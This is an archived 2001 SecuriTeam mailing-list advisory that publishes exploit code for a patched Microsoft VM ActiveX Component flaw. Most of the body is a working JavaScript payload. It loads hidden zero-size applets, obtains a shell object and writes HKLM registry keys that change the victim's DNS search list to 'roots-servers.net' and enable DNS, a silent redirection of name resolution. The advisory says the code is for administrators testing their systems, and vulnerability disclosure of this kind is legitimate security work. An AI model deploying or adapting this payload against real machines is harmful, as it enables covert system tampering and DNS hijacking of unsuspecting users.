[EXPL] JavaScript Can Write Anything to the Windows' Registry
From: support@securiteam.comDate: 09/02/01
- Previous message: support@securiteam.com: "[UNIX] Security Hole in OS Groupware Suite PHProjekt Patched"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] JavaScript Can Write Anything to the Windows' Registry Message-Id: <20010902151515.BAC17138C0@mail.der-keiler.de> Date: Sun, 2 Sep 2001 17:15:15 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
JavaScript Can Write Anything to the Windows' Registry
------------------------------------------------------------------------
SUMMARY
Some time ago, Microsoft has released a patch for:
<http://www.securiteam.com/windowsntfocus/6G00M0K02G.html> Microsoft VM
ActiveX Component vulnerability, the following is an exploit code for that
vulnerability (the patch was released over 11 months ago) allowing
administrator to test their system for the mentioned problem.
DETAILS
Exploit:
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
ADDITIONAL INFORMATION
The information has been provided by <mailto:marcin@jackowski.net> Marcin
Jackowski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Security Hole in OS Groupware Suite PHProjekt Patched"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Pine Privacy Patch
... The Pine email client allows users to define the "From:" address ... Applying
the following patch to pine 4.4 will cause Sender: ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [UNIX] phpBBs Gender Mod Allows Gaining Administrative Privileges
... * Gender Mod version 1.1.3 ... File to patch, forumroot/includes/usercp_register.php:
... The information in this bulletin is provided "AS IS" without warranty of any kind.
... In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [TOOL] OpenSSH Snoop Patch
... Subject: OpenSSH Snoop Patch ... Common subdirectories: old/openbsd-compat
and new/openbsd-compat ... The information in this bulletin is provided "AS IS" without
warranty of any kind. ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [UNIX] Snort Core Dump Vulnerability
... It is possible to cause <http://www.snort.org/> Snort, ... Snort version
1.8 and prior (without the patch) ... The information in this bulletin is provided
"AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [EXPL] SLMail PASS Buffer Overflow
... The following exploit code can be used to test your SLMail ... # Discovered
by: Muts # ... The information in this bulletin is provided "AS IS" without warranty
of any kind. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam)
